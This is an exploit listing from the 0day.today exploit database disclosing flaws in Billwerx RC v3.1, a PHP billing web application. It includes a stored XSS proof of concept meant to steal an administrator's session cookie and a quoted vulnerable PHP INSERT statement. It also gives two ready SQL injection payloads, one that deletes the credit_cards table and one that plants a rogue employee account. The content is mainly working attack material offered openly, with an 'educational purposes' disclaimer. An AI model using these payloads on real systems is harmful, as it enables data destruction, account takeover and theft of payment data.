[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Billwerx RC v3.1 Multiple Vulnerabilities

Author
mr_me
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10197
Category
web applications
Date add
11-12-2009
Platform
unsorted
=========================================
Billwerx RC v3.1 Multiple Vulnerabilities
=========================================

#################################################################
 
#
 
# Billwerx RC v3.1 Multiple Vulnerabilities
 
# Found By: mr_me
 
# Download: http://www.billwerx.com/download.php
 
# Tested On: Windows Vista
 
# Note: For educational purposes only
 
#
 
#################################################################
 
 
 
XSS POC:
 
 
 
A regular employee can embed javascript code that could be executed within the context of the admin's browser.
 
If the user edits their own profile by going to "http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2"
 
and places "<script>alert(document.cookie)</script>"
 
into any of the following fields: 'firstname', 'billing address', 'billing city', 'billing province', 'billing postal', 'billing country' and then gives the following link to the admin:
 
 
 
http://[server]/billwerx_public_beta/employees/update_employee.php?employee_id=2
 
 
 
The user could potentially log the admins cookie and reset their own session thus gaining administration access.
 
 
 
SQL Injection POC:
 
 
 
http://127.0.0.1/billwerx_public_beta/employees/company_files.php
 
 
 
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1
 
 
 
Here you can see in the code snip that the description post value is unsanitized.
 
 
 
8<-------------snip-------------8<
 
 
 
$description = strtolower($_POST['description']);
 
 
 
$employee_id = $_SESSION['employee_id'];
 
 
 
$readfile = fopen($temp_name, 'r');
 
$content = fread($readfile, filesize($temp_name));
 
$content = addslashes($content);
 
fclose($readfile);
 
 
 
# Assign values to a database table:
 
$doSQL = "INSERT INTO company_files (name, size, type, content, public, description, employee_id) VALUES ('$name', '$size', '$type', '$content', '$public', '$description', '$employee_id')";
 
 
 
8<-------------snip-------------8<
 
 
 
SQL Injection exploit:
 
 
 
','1'); DELETE FROM credit_cards;/*
 
 
 
or
 
 
 
','1'); insert into employees values (4, 'mr_me', 'hello', '', '', '', '', '', 'mr_me@hax0r.com', 'lol_mypassword', 0.00, 3, '', '', '', '', '', '2009-07-28 10:47:59');/*



#  0day.today [2024-12-24]  #